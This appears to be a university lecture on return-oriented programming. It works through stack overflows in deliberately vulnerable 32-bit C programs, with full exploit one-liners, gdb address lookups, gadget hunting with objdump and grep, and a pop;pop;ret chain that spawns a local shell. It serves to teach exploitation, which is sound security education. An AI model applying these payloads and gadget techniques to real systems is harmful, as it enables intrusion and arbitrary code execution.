Lec. 23: Gadgets in Return Oriented Programs
1 Return Oriented Programming: Function Chaining Gadgets
Return Oriented Programming (ROP) is the technique of building an exploit out of small sequences of code, called gadgets, that are already embedded in other code. The "return" in the name comes from the fact that every gadget ends with a ret instruction. The idea is that while there may be protections in place to stop us from loading shell code, we can still leverage the code already within our target program.
An additional benefit of ROP, similar to the benefit of return-2-libc, is that a ROP chain works even when the stack memory is marked non-executable and there is memory address randomization. The reason is that we only use already existing code to build the exploit, namely code in the .text segment, which is already marked executable. Moreover, for binaries that are not built as position-independent executables, like the ones in this lesson, ASLR does not randomize the .text segment, so that code is always in the same place. This makes this style of attack both powerful and consistent.
Below, we follow an example where we use ROP to properly chain function calls together, but we will also look at an example where the ROP chain itself, without calling any other function, is capable of launching a shell. Also note that all the code we work with in this lesson is compiled without an executable stack, so we can't easily load shell code [1].
1.1 Overwriting the return address with function calls
Let's start with a simple example of where ROP becomes very useful. Consider the following code, where we want bad() to get called:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    void bad(){
      printf("You've been PWNED!\n");
    }

    void vuln(char * s){
      char buf[100];
      strcpy(buf,s);
      printf("Buf: %s\n", buf);
    }

    void main(int argc, char * argv[]){
      vuln(argv[1]);
    }
We know how to solve this one: we overflow the buffer and overwrite the return address of vuln() with the address of bad(). To do this, we first look at the disassembled code to see where the buffer is placed in relation to the return address:
    user@si485H-base:demo$ objdump -d -M intel call_bad
    (...)
    0804847d <bad>:
     804847d:   55                      push   ebp
     804847e:   89 e5                   mov    ebp,esp
     8048480:   83 ec 18                sub    esp,0x18
     8048483:   c7 04 24 70 85 04 08    mov    DWORD PTR [esp],0x8048570
     804848a:   e8 c1 fe ff ff          call   8048350 <puts@plt>
     804848f:   c9                      leave
     8048490:   c3                      ret
    (...)
    08048491 <vuln>:
     8048491:   55                      push   ebp
     8048492:   89 e5                   mov    ebp,esp
     8048494:   81 ec 88 00 00 00       sub    esp,0x88
     804849a:   8b 45 08                mov    eax,DWORD PTR [ebp+0x8]
     804849d:   89 44 24 04             mov    DWORD PTR [esp+0x4],eax
     80484a1:   8d 45 94                lea    eax,[ebp-0x6c]
     80484a4:   89 04 24                mov    DWORD PTR [esp],eax
     80484a7:   e8 94 fe ff ff          call   8048340 <strcpy@plt>
     80484ac:   8d 45 94                lea    eax,[ebp-0x6c]
     80484af:   89 44 24 04             mov    DWORD PTR [esp+0x4],eax
     80484b3:   c7 04 24 83 85 04 08    mov    DWORD PTR [esp],0x8048583
     80484ba:   e8 71 fe ff ff          call   8048330 <printf@plt>
     80484bf:   c9                      leave
     80484c0:   c3                      ret
    (...)
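We see that the buffer starts at ebp-0x6c, so 0x6c bytes of padding reach the saved ebp, 4 more bytes cover the saved ebp, and the next 4 bytes overwrite the return address. We can quickly write the exploit like so, where we jump to bad():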
    user@si485H-base:demo$ ./call_bad `python -c "print 'A'*(0x6c+4) + '\x7d\x84\x04\x08'"`
    Buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}?
    You've been PWNED!
    Segmentation fault (core dumped)
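The offset arithmetic in that one-liner can be spelled out as a small sketch. This is written in Python 3 rather than the Python 2 used on the command line, and the names `BUF_OFFSET`, `SAVED_EBP`, and `overflow_payload` are illustrative choices, not part of the lecture code.

```python
import struct

BUF_OFFSET = 0x6c      # buf starts at ebp-0x6c (the lea in vuln)
SAVED_EBP = 4          # saved ebp sits between buf and the return address
BAD_ADDR = 0x0804847d  # address of bad() from the objdump listing


def overflow_payload(target, offset=BUF_OFFSET + SAVED_EBP):
    """Padding up to the return address, then the 32-bit little-endian target."""
    return b"A" * offset + struct.pack("<I", target)


payload = overflow_payload(BAD_ADDR)
print(len(payload), payload[-4:].hex())
```

Packing with `"<I"` produces the same byte order as the hand-written `'\x7d\x84\x04\x08'`, which is why the address appears reversed on the command line.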
1.2 Functions with Arguments
We can make the exploit a little more interesting if bad() calls system() with its argument:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    char pwn[]="/bin/sh";

    void bad(char * s){
      printf("You've been PWNED!\n");
      system(s);
    }

    void vuln(char * s){
      char buf[100];
      strcpy(buf,s);
      printf("Buf: %s\n", buf);
    }

    void main(int argc, char * argv[]){
      vuln(argv[1]);
    }
In this scenario, much like a return-2-libc attack, if we have the stack properly aligned with the right argument, namely pwn, then we'll get a shell to launch. For that to happen, we'll need the exploit on the stack to look like this:
    | <addr pwn>        |
    | bad's ret address |
    | <addr bad>        |
That is, the address of bad overwrites the return address of vuln. The next item in the stack will be bad's return address, which we don't need to worry about; however, the following item is the first argument to bad, which should be pwn.
To complete this exploit, we determine the addresses of pwn and bad, and give it a go.
    user@si485H-base:demo$ gdb -q call_bad_sh
    Reading symbols from call_bad_sh...done.
    (gdb) x/x pwn
    0x804a02c <pwn>:	0x6e69622f
    (gdb) x/x bad
    0x80484ad <bad>:	0x83e58955
    (gdb) quit
    user@si485H-base:demo$ ./call_bad_sh `python -c "print 'A'*(0x6c+4) + '\xad\x84\x04\x08' + '\xfe\xbe\xad\xde' + '\x2c\xa0\x04\x08'"`
    Buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?????,?
    You've been PWNED!
    $
That's not too bad.
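The three-slot layout (function address, its return address, its argument) can be captured in a small helper. The following is a Python 3 sketch; `p32` and `call_frame` are hypothetical helper names, and the addresses are the ones gdb reported for call_bad_sh.

```python
import struct


def p32(value):
    """Pack a 32-bit little-endian word, as x86 stores addresses."""
    return struct.pack("<I", value)


def call_frame(func, ret, *args):
    """Words for one call: target address, its return address, then its arguments."""
    return p32(func) + p32(ret) + b"".join(p32(a) for a in args)


PAD = b"A" * (0x6c + 4)   # fill buf and the saved ebp
BAD = 0x080484ad          # address of bad() in call_bad_sh
PWN = 0x0804a02c          # address of the "/bin/sh" string

# 0xdeadbefe is the throwaway return address used on the command line.
payload = PAD + call_frame(BAD, 0xdeadbefe, PWN)

# strcpy stops at the first NUL byte, so the payload must not contain one.
assert b"\x00" not in payload
print(payload[len(PAD):].hex())
```

The NUL check matters because the overflow goes through strcpy(): any zero byte inside an address or argument would truncate the copy before the rest of the chain reaches the stack.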
1.3 Chaining Two Functions with Arguments
Let's add a bit more complexity to this exploit. Suppose now we want to make a call to another function first before calling bad(), and the arguments to those functions matter.
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    char pwn[100];

    void bin_sh(int magicbeef){
      if (magicbeef == 0xdeadbeef){
        strcat(pwn,"/bin/sh");
      }
      printf("pwn: %s\n",pwn);
    }

    void bad(char * s){
      printf("You've been PWNED!\n");
      system(s);
    }

    void vuln(char * s){
      char buf[100];
      strcpy(buf,s);
      printf("Buf: %s\n", buf);
    }

    void main(int argc, char * argv[]){
      pwn[0]='\0';
      vuln(argv[1]);
    }
This time we need to first call bin_sh() with magicbeef set to 0xdeadbeef, and then call bad() afterwards to get our shell. This might seem like no problem at first, but once we try it out, you'll see where the challenge arises.
Starting with the easy part, we can look at what the stack should be to properly call bin_sh():
    | 0xdeadbeef           |
    | bin_sh's ret address |
    | <addr bin_sh>        |
We overwrite the return address of vuln() with the address of bin_sh(), whose argument is 0xdeadbeef. In the last example, we didn't care about the return address of the function we jumped to, but this time we have to. What is the next function we call? bad(). So what we really need is for the stack to look like this:
    | <addr pwn>    |
    | 0xdeadbeef    |
    | <addr bad>    |
    | <addr bin_sh> |
If you follow the stack, the argument to bin_sh() is 0xdeadbeef and its return address is bad(). The argument to bad() is pwn, and the return address for bad() is 0xdeadbeef, which doesn't matter because at that point we already have the shell.
Let's give it a try:
    user@si485H-base:demo$ gdb -q call_bad_chain
    Reading symbols from call_bad_chain...done.
    (gdb) x/x pwn
    0x804a060 <pwn>:	0x00000000
    (gdb) x/x bad
    0x8048505 <bad>:	0x83e58955
    (gdb) x/x bin_sh
    0x80484ad <bin_sh>:	0x57e58955
    (gdb) quit
    user@si485H-base:demo$ ./call_bad_chain `python -c "print 'A'*(0x6c+4) + '\xad\x84\x04\x08' +'\x05\x85\x04\x08' +'\xef\xbe\xad\xde' + '\x60\xa0\x04\x08'"`
    Buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?ᆳ?`?
    pwn: /bin/sh
    You've been PWNED!
    $
It's a shell! Great.
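To make the overlapping roles of each stack word explicit, here is a Python 3 sketch that labels every slot of the two-function chain before packing it. The role strings and variable names are illustrative; the addresses are those gdb reported for call_bad_chain.

```python
import struct

BIN_SH = 0x080484ad  # address of bin_sh()
BAD = 0x08048505     # address of bad()
PWN = 0x0804a060     # address of the pwn buffer

# Slots in the order they are written, lowest address first.
chain = [
    ("vuln's return address: jump to bin_sh", BIN_SH),
    ("bin_sh's return address: jump to bad", BAD),
    ("bin_sh's argument, doubling as bad's return address", 0xdeadbeef),
    ("bad's argument: pointer to pwn", PWN),
]

payload = b"A" * (0x6c + 4) + b"".join(struct.pack("<I", v) for _, v in chain)

for index, (role, value) in enumerate(chain):
    print(f"+{4 * index:02d}  0x{value:08x}  {role}")
```

The third slot is the one to watch: it serves two purposes at once, which only works here because bad() never needs a meaningful return address.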
1.4 Chaining Three or More Functions with Arguments
It's about to fall apart. Consider what happens when we need to call another function in this chain. Where could it go? Right now we have this.
    | <addr pwn>    |
    | 0xdeadbeef    | <-- bad's return address is bin_sh's argument
    | <addr bad>    |
    | <addr bin_sh> |
The slot for bad's return address is already being used for the argument to bin_sh(). We're hosed. Worse, consider what would happen in this code example, where one of the functions needs to take two arguments:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    char pwn[100];

    void add_bin(int magiccafe, int magicfood){
      if (magiccafe == 0xcafebabe && magicfood == 0x0badf00d){
        strcat(pwn,"/bin");
      }
      printf("add_bin: pwn: %s\n", pwn);
    }

    void add_sh(int magicbeef){
      if (magicbeef == 0xdeadbeef){
        strcat(pwn,"/sh");
      }
      printf("add_sh: pwn: %s\n", pwn);
    }

    void bad(char * s){
      printf("You've been PWNED!\n");
      system(s);
    }

    void vuln(char * s){
      char buf[100];
      strcpy(buf,s);
      printf("Buf: %s\n", buf);
    }

    void main(int argc, char * argv[]){
      pwn[0]='\0';
      vuln(argv[1]);
    }
Now the construction of the /bin/sh string happens in two parts, and one of the functions requires two arguments. It looks like our luck has run out and this is impossible, but just in case, let's look at the stack anyway.
Starting with the first function, add_bin(), and its two arguments, which should be followed by add_sh(), we'd need something like this:
    | 0x0badf00d     |
    | 0xcafebabe     |
    | <addr add_sh>  |
    | <addr add_bin> |
That's possible, but then we reach an impasse: add_sh() takes one argument, and the way the stack is aligned, that argument is 0x0badf00d. That's just not what we need; we need 0xdeadbeef.
It would seem like this is impossible, but think about what we could do if we were able to clear the stack. Suppose we had a gadget, a little piece of code that only did pop;pop;ret. Then add_bin() could return to the gadget instead of directly to add_sh(), and the gadget would clear add_bin()'s arguments off the stack before the next return. Something like the following:
    | <addr pwn>         |
    | 0xdeadbeef         |
    | <addr bad>         |
    | <addr add_sh>      |
    | 0x0badf00d         |
    | 0xcafebabe         |
    | <addr pop;pop;ret> |
    | <addr add_bin>     |
If you follow the function chain, after add_bin() is called with arguments 0xcafebabe and 0x0badf00d, it returns into the gadget, which pops 0xcafebabe and 0x0badf00d off the stack. When the gadget returns, the next address on the stack is add_sh(), whose argument is 0xdeadbeef. The return address of add_sh() is bad(), and thus the exploit completes.
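One way to convince yourself that the layout works is to walk it by hand, or with a toy model. The Python 3 sketch below simulates only the stack pointer and the cdecl argument positions; the addresses are placeholders (hypothetical values, since the real ones have not been looked up at this point), and `trace` is an illustrative name.

```python
# Placeholder addresses (hypothetical); the real ones come from gdb/objdump.
ADD_BIN, ADD_SH, BAD, PWN, POP_POP_RET = 0x1000, 0x2000, 0x3000, 0x4000, 0x5000
FUNCS = {ADD_BIN: ("add_bin", 2), ADD_SH: ("add_sh", 1), BAD: ("bad", 1)}

# Stack words in the order they are written, lowest address first
# (the diagram lists them top-down, highest address first).
words = [ADD_BIN, POP_POP_RET, 0xcafebabe, 0x0badf00d,
         ADD_SH, BAD, 0xdeadbeef, PWN]


def trace(words):
    """Follow the chain of rets and record what each step would see."""
    steps, esp = [], 0
    while esp < len(words):
        target = words[esp]   # ret pops the next address ...
        esp += 1              # ... leaving esp at the callee's return slot
        if target in FUNCS:
            name, nargs = FUNCS[target]
            # cdecl: arguments sit just above the callee's return address
            steps.append((name, words[esp + 1:esp + 1 + nargs]))
        elif target == POP_POP_RET:
            esp += 2          # the two pops discard add_bin's arguments
            steps.append(("pop;pop;ret", []))
        else:
            break             # unknown address: the real program would crash here
    return steps


for name, args in trace(words):
    print(name, [hex(a) for a in args])
```

Running the same model on the gadget-less layout `[ADD_BIN, ADD_SH, 0xcafebabe, 0x0badf00d]` shows add_sh receiving 0x0badf00d as its argument, which is exactly the impasse described earlier.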
2 ROP Gadgets
We've been doing a bit of return oriented programming already, but now we really get into it. The big idea so far was to chain a bunch of functions together through their return addresses to complete a task. That is a form of return oriented programming, but now we need something different. We need a very specific sequence of instructions, a pop;pop;ret, which is not a typical function that we can write. How do we find such a thing?
The answer lies in the code itself. While we as C programmers will never explicitly write a function that is just pop;pop;ret, the C compiler will most certainly emit code that contains that sequence of instructions. We describe that sequence as a gadget because it unintentionally gives us the functionality we need, and it ends in a ret instruction so it can be chained with other function calls.
2.1 Hunting a Gadget
The key now is to hunt down the gadget we need. For that, we can use objdump and grep. For reference the -A option with grep prints the specified number of lines after a match, and the -B option with grep prints the specified number of lines before a match.
    user@si485H-base:demo$ objdump -d -M intel call_bad_doublechain | grep -B 3 ret | grep -A 3 pop
     8048335:   5b                      pop    ebx
     8048336:   c3                      ret
    --
    --
     8048508:   5f                      pop    edi
     8048509:   5d                      pop    ebp
     804850a:   c3                      ret
    --
     8048556:   83 c4 14                add    esp,0x14
     8048559:   5f                      pop    edi
     804855a:   5d                      pop    ebp
     804855b:   c3                      ret
    --
     8048571:   89 04 24                mov    DWORD PTR [esp],eax
    --
     804862d:   5e                      pop    esi
     804862e:   5f                      pop    edi
     804862f:   5d                      pop    ebp
     8048630:   c3                      ret
    --
     804863f:   90                      nop
    --
     8048656:   5b                      pop    ebx
     8048657:   c3                      ret
The first grep above looked for any ret instruction, printing the 3 previous lines. The second grep then searched that output for a pop instruction, printing the 3 lines after. The result shows several instances of pop;pop;ret; we will use the one at address 0x08048508. What is also important with this gadget is that we don't care where the data is popped to. Any of the registers is fine, as long as the data is popped off the stack.
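The same hunt can be done on raw machine code instead of disassembly text. The Python 3 sketch below scans a byte string for two one-byte `pop r32` opcodes followed by `ret` (0xc3). The function name `find_pop_pop_ret` is an illustrative choice, and the sample bytes are copied from the listing at 0x8048556; `pop esp` is deliberately excluded because it would move the stack pointer rather than just discard a word.

```python
# One-byte x86 "pop r32" opcodes are 0x58 (eax) through 0x5f (edi).
# 0x5c is pop esp, which would redirect the stack, so it is left out.
POP_REG = set(range(0x58, 0x60)) - {0x5c}
RET = 0xc3


def find_pop_pop_ret(code, base):
    """Return the addresses of every pop;pop;ret byte sequence in code."""
    hits = []
    for i in range(len(code) - 2):
        if code[i] in POP_REG and code[i + 1] in POP_REG and code[i + 2] == RET:
            hits.append(base + i)
    return hits


# Bytes from the listing: add esp,0x14 ; pop edi ; pop ebp ; ret
snippet = bytes.fromhex("83c4145f5dc3")
print([hex(addr) for addr in find_pop_pop_ret(snippet, 0x8048556)])
```

Unlike the grep pipeline, a byte-level scan does not depend on where the disassembler thinks instructions begin, so on a full .text segment it may also report sequences that start in the middle of a longer instruction.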
2.2 Using the gadget
With this information in place, we can complete the exploit by first identifying the other important addresses and then lining up our stack like below:
    | <addr pwn>         |
    | 0xdeadbeef         |
    | <addr bad>         |
    | <addr add_sh>      |
    | 0x0badf00d         |
    | 0xcafebabe         |
    | <addr pop;pop;ret> |
    | <addr add_bin>     |
We can use gdb to find the other addresses:
    user@si485H-base:demo$ gdb -q call_bad_doublechain
    Reading symbols from call_bad_doublechain...done.
    (gdb) x/x add_bin
    0x80484ad <add_bin>:	0x57e58955
    (gdb) x/x add_sh
    0x804850b <add_sh>:	0x57e58955
    (gdb) x/x bad
    0x804855c <bad>:	0x83e58955
    (gdb) x/x pwn
    0x804a060 <pwn>:	0x00000000
    (gdb) quit
    user@si485H-base:demo$ ./call_bad_doublechain `python -c "s='A'*(0x6c+4); s+='\xad\x84\x04\x08'; s+='\x08\x85\x04\x08'; s+='\xbe\xba\xfe\xca'; s+='\x0d\xf0\xad\x0b'; s+='\x0b\x85\x04\x08'; s+='\x5c\x85\x04\x08'; s+='\xef\xbe\xad\xde'; s+='\x60\xa0\x04\x08'; print s; "`
    ?uf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA???? \ᆳ?`?
    add_bin: pwn: /bin
    add_sh: pwn: /bin/sh
    You've been PWNED!
    $
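The payload passed on the command line can be rebuilt from the addresses rather than from hand-reversed escape strings. This is a Python 3 sketch; `p32` and `shell_escapes` are hypothetical helper names, and the addresses are the ones reported by gdb and the gadget search for call_bad_doublechain.

```python
import struct


def p32(value):
    """Pack a 32-bit little-endian word, as x86 stores addresses."""
    return struct.pack("<I", value)


# Addresses from the gdb session and the gadget search.
ADD_BIN, ADD_SH, BAD, PWN = 0x080484ad, 0x0804850b, 0x0804855c, 0x0804a060
POP_POP_RET = 0x08048508

words = [ADD_BIN, POP_POP_RET, 0xcafebabe, 0x0badf00d,
         ADD_SH, BAD, 0xdeadbeef, PWN]
payload = b"A" * (0x6c + 4) + b"".join(p32(w) for w in words)

# strcpy stops copying at the first NUL byte, so none may appear in the chain.
assert b"\x00" not in payload


def shell_escapes(data):
    """Render bytes as \\xNN escapes for pasting into a quoted string."""
    return "".join(f"\\x{b:02x}" for b in data)


print(shell_escapes(payload[-32:]))
```

Keeping the chain as a list of integers makes it easy to swap in a different gadget address, for example one of the other pop;pop;ret sequences found by the search, without re-deriving the byte order by hand.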
2.3 Where do we go from here?
In this example, we used a gadget within the code to do the simple task of chaining functions with different numbers of arguments. What if we were to do something more interesting? What if we were able to find enough gadgets to build a complete exploit? That is the idea behind a full ROP exploit, and believe it or not, you can do everything shell code would do using only small gadgets. And, yes, it is as awesome as it sounds!
Footnotes:
[1] Many of the ROP examples are adapted from the CodeArcanna article by Alex Reese, Tue 28 May 2013.